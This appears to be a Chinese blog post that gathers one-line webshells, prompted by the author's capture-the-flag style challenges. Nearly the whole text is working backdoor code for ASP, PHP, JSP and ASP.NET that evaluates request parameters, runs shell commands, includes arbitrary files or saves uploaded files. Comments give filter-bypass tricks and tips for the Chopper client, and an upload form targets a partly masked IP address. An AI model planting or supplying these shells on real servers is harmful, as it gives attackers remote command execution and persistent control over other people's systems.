最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新
<%eval request("sb")%><%execute request("sb")%><%execute(request("sb"))%><%execute request("sb")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("sb")%><%execute request("sb")'<% loop <%:%>[code][code]<script language=vbs runat=server>eval(request("sb"))</script><%execute request("sb")'<% loop <%:%>[code][code]<script language=vbs runat=server>eval(request("sb"))</script>%><%Eval(Request(chr(35)))%><%<%eval request("sb")%><%ExecuteGlobal request("sb")%>if Request("sb")<>"" then ExecuteGlobal request("sb") end if<?php eval($_POST[sb])?><?php @eval($_POST[sb])?> //容错代码<?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句<?$_POST['sa']($_POST['sb']);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@preg_replace("/[email]/e",$_POST['h'],"error");?>//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入<O>h=@eval($_POST[c]);</O><script language="php">@eval($_POST[sb])</script>//绕过<?限制的一句话<?=@eval($_POST['cmd']);//这个也是吊炸天...<?=`*`;//吊炸天!大致上等价于//<?php echo `bash bash2 index.html p.php` ?>//访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉//通过修改bash2这个文件的内容就可以构造命令执行。$filename=$_GET['xbid'];include ($filename);//危险的include函数,直接编译任何文件为php格式运行$reg="c"."o"."p"."y";$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%><form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post"><textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br><input type=submit value="提交"></form><%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%><%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>//Jscript的asp.net一句话<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>//C#的asp.net一句话<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>//VB的asp.net一句话联系客服
